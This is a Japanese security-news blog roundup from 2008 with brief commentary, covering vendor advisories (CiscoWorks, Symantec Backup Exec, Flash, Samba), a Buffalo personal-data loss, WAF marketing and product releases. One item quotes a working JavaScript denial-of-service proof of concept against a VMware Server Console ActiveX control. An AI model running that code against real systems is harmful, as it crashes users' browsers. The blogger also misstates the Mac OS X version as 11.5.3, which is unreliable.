パターンアップ-5.305.00
Trendmicroのパターンがアップしました。
パターン番号:5.305.00
イエローアラート:なし アップデート理由:SWF_DLOADER.ZTS緊急対応 新規対応 緊急対応 SWF_DLOADER.ZTS 亜種対応 特筆無し
Cisco Systems - Redirect to
Cisco Worksにリモートから任意のコードを実行できる脆弱性が存在するそうです。
CiscoWorks Common Services contains a vulnerability that could allow a remote attacker to execute arbitrary code. This vulnerability is documented in Cisco Bug ID CSCsm77245 ( registered customers only) , and has been assigned the Common Vulnerabilities and Exposures (CVE) ID CVE-2008-2054.
Symantec Backup Exec System Recovery Manager Directory Traversal Vulnerability
BackupExecのSystem Recovery Managerにディレクトリトラバーサルの脆弱性が存在するそうです。
Symantec Backup Exec System Recovery Manager is prone to a directory-traversal vulnerability.
An attacker can exploit this issue to access privileged system files and gain unauthorized access to the affected computer.
This issue affects these versions:
Symantec Backup Exec System Recovery Manager 7 prior to 7.0.4
Symantec Back Exec System Recovery Manager 8 prior to 8.0.2.
パソコン周辺機器バッファローのプレスリリース 個人情報の紛失事故について
保管場所変更対応で社内専用便で輸送中に荷崩れで箱1個が紛失したそうです。
1.紛失事故の概要
2008年5月26日10時5分頃、修理受付票及びその添付関連書類の入った文書保存箱を保管場所変更の目的で社内専用便により輸送中、荷崩れし1箱が落下しました。その後多くは回収できましたが、一部が未回収となっております。
2.紛失した個人情報
・修理受付票及びその添付関連書類に記載の個人情報 99名分
3/14・17・18日に、当社から修理品をお送りしたお客様の一部が該当します。3.紛失した個人情報の内容
氏名、住所、電話番号、FAX番号、Eメールアドレス
99名分だそうです。
2.紛失した個人情報
修理受付票及びその添付関連書類に記載の個人情報 99名様分
3/14・17・18日に、当社から修理品をお送りしたお客様の一部が該当します。
シスコがルーターのAPIを公開、動的な設定変更などを可能に:ITpro
連絡が取れない歴史的PIアドレスの割り当て先一覧の再確認のお願い
歴史的PIアドレスで連絡が取れない組織への最終勧告。
JPNICでは、3月11日より、 使用されておらず連絡が取れない歴史的 PIアドレスの割り当て先組織の一覧を公開しております。 公開後、一部については関係組織の方からご連絡があり、 おかげさまでIPアドレスおよび割り当て先の状況を確認させていただくことができました。
公開期間は6月10日までの予定であり、 公開期間の終了が近づいてまいりましたので、再度ご連絡申し上げます。 いま一度ご確認のうえ、 リスト中の割り当て先組織に該当すると思われる組織のご担当者様におかれましては、 下記の必要事項を明記のうえ、 JPNICへ電子メールにてご連絡を賜りますようお願い申し上げます
「PCI DSS対策にはWAFの導入が必須だ」---Web高速化装置大手のF5がアピール:ITpro
PCI DSSではWAFが必要ですか・・・
「安全なクレジット・カード決済のため,WAF(Web Application Firewall)の重要性が増している。企業にとってWAFはもはや必須だ」---。こうWAFの重要性をアピールするのは,WAF機能を持つWeb高速化装置を出荷するF5ネットワークスジャパンである。同社でエンジニアリングマネージャを務めるJoe Poehls氏は2008年5月28日,WAFが必須となる根拠を示すとともに,同社製品が備えるWAF機能をアピールした。
F5さん、WAFの導入がもはや簡単とかおっしゃってますよ!
IPS的な動きと、自動学習で簡単導入らしいです。じゃ、毎日同じ時間に同じ攻撃パケットを送ればホワイトになるとw
同社はさらに,WAFの導入はもはや簡単であり,従来のような導入の難しさが無くなった点を強調した。以前のWAFでは,WAFに対するセキュリティ・ポリシーを設定するために,守るべき業務アプリケーションの内容について詳しく知る必要があったという。ところが,現在では,既知の攻撃パターンが分かっているほか,日常のトレンドを自動学習した上で日常と異なるアクセスを検知することも可能であり,さらにポリシー設定の方法に工夫を凝らすことで初期導入と運用開始までの時間が短く済むとしている。
転送データにクレジットカード情報が入っていたらとめる?外向けに出たらとめるってことか。
通常ならルートが違うだろうからそっちにIPSを入れるってイメージかな。
大手クレジットカード会社のカード番号に関する知識wwww、カード番号パターンとかか!
PCI DSS対策を特に意識した機能としては,転送データ中にクレジットカード情報が含まれていた場合にアクセスをブロックしたり,転送データ内のクレジットカード情報の一部分をマスキングして全体像を分からなくする機能がある。BIG-IP ASMの場合では,クレジットカードに関連した情報であるかどうかを判断するための材料として,大手クレジットカード会社のカード番号に関する知識を備えているという。
Apple,「Mac OS X」の最新アップデート「10.5.3」をリリース:ITpro
MacOSX 11.5.3がリリースされたそうです。
10.4なので、、、、、
同社は,バージョン10.5以上を使用しているユーザーにアップグレードを推奨している。同社のダウンロード・サイトより入手できるほか,ソフトウェア・アップデート機能を使ったインストールが可能である。
Webセキュリティを強化するレピュテーション機能を搭載 「Trend Micro InterScan Web Security Suite(TM) 3.1」を発表
TrendmicroがInterScan Web Security Suite 3.1を出したそうです。やっとか。
■ 主な機能と特徴
●HTTPおよびFTPの不正プログラムを検出
企業ネットワークとインターネットの境界で、Webサイトとの通信(HTTP)やファイル転送(FTP)に潜むウイルスやスパイウェアを検出し防ぎます。ファイルのダウンロードに加え、外部への発信も検索できます。●Webレピュテーション機能の搭載
Webサイトの危険度を採点し、危険なWebサイトへのアクセスを防ぐWebレピュテーション機能を搭載します。Webを経由し連鎖型攻撃を行う「Webからの脅威」へ適切に対処できます。●運用状況の把握に役立つ多彩なレポート機能
管理コンソール上で、ウイルスやスパイウェアの感染状況やクライアントの接続状況をリアルタイムにグラフで表示します。期間を指定して運用状況をレポートとして集計することも可能です。
InterScan Web Security Suite でWebレピュテーションを搭載したそうです!
トレンドマイクロは5月29日、企業向けWebセキュリティ製品スイートの最新版「Trend Micro InterScan Web Security Suite 3.1」を発売した。危険サイトのデータベースを参照してユーザーのアクセスを防止する「Webレピュテーション」機能を搭載した。
Flashの脆弱性は最新版で修正済み、Adobeが調査結果を公表
Malicious swf files? (SANS) - まっちゃだいふくの日記★とれんどふりーく★の件とか、Adobe flash player vuln(SANS) - まっちゃだいふくの日記★とれんどふりーく★の件とか、結局Adobeは既知の問題で9.0.124.0で修正済みとの事。
最新版は影響ないとの最終報告をJPCERTが出しました。
28日の発表によると、Adobe Flash Playerには第三者が任意のコードを実行できる未修正の脆弱性があり、その脆弱性を使用した攻撃がすでに発生しているとのことだった。しかし、その後の調査で同脆弱性は4月8日にリリースされたFlash Player 9.0.124.0ですでに修正されていることが判明した。これにより、同脆弱性で影響を受ける製品はFlash Player 9.0.115.0、およびそれ以前、またはFlash Player 8.0.39.0、およびそれ以前となった。
関連URL
(関連:Flashの脆弱性は最新版で修正済み、Adobeが調査結果を公表 - まっちゃだいふくの日記★とれんどふりーく★、Malicious swf files? (SANS) - まっちゃだいふくの日記★とれんどふりーく★、Adobe flash player vuln(SANS) - まっちゃだいふくの日記★とれんどふりーく★)
asahi.com: ディスカバリー打ち上げカウントダウン始まる - サイエンス
もうカウントダウンですか、6月1日に打ち上げだったかな。
【ケネディ宇宙センター(米フロリダ州)=田之畑仁】米航空宇宙局(NASA)は米東部時間28日午後3時(日本時間29日午前4時)、日本人宇宙飛行士・星出(ほしで)彰彦さん(39)らが搭乗するスペースシャトル・ディスカバリーの打ち上げに向けたカウントダウンを始めた。
「学校裏サイト」に特化した検索サイト「学校裏チェッカー」開設:RBB NAVi (ブロードバンドコンテンツ 検索サービス) 2008/05/29
学校の裏サイト専用検索サイトを作ったそうです。
VMware Server Console ActiveX Denial of Service PoC
遊んでる?!2008個を入れると死ぬみたい。
<!-- <script language="JavaScript"> function test() { var bufA = "2"; var bufB = "0"; var bufC = "0"; var bufD = "8"; for (i = 0; i < 2008; i++) { bufA += bufA;} for (i = 0; i < 2008; i++){ bufB += bufB;} for (i = 0; i < 2008; i++){ bufC += bufC;} for (i = 0; i < 2008; i++){ bufD += bufD;} nansec.DoModalDirect(bufA,bufB,bufC,bufD);} </script> -->
アップデートは近日中に? :Sambaに深刻な脆弱性、不正パケットで悪用の恐れ - ITmedia エンタープライズ
「情報共有→ビジネス成功」を導くノウハウはこれだ
SNSで雑談をすることを問題視する経営層がいるそうですが、普通の雑談やメールと何が違うのか?という意見
確かに。雑談との違いはないねぇ・・・
ここで、よく聞かれるのが、ブログやSNSを社内で展開すると、社員が業務に関係ない雑談に時間を費やすことになり、生産性が低下するのではという意見だ。これは、Enterprise 2.0に対して典型的に聞かれる、日本のマネジメント層の反応だが、マカフィー教授によれば米国でも状況は似たようなものであるそうだ。
この不安に対してマカフィー教授は「Enterprise 2.0を導入する前は、あなたの会社の社員は会社で業務以外の会話を全くしなかったのですか?」と回答するそうだ。多少の遊びの要素はどの組織にもあるし、それが必ずしも悪いこととは言えない。もちろん、極端なケース(たとえば、明らかに違法な情報をブログに書き込んだり、丸一日をブログに費やすなど)に対してはマネジメントのアクションが必要だが、過剰なルール設定は避けるべきだ。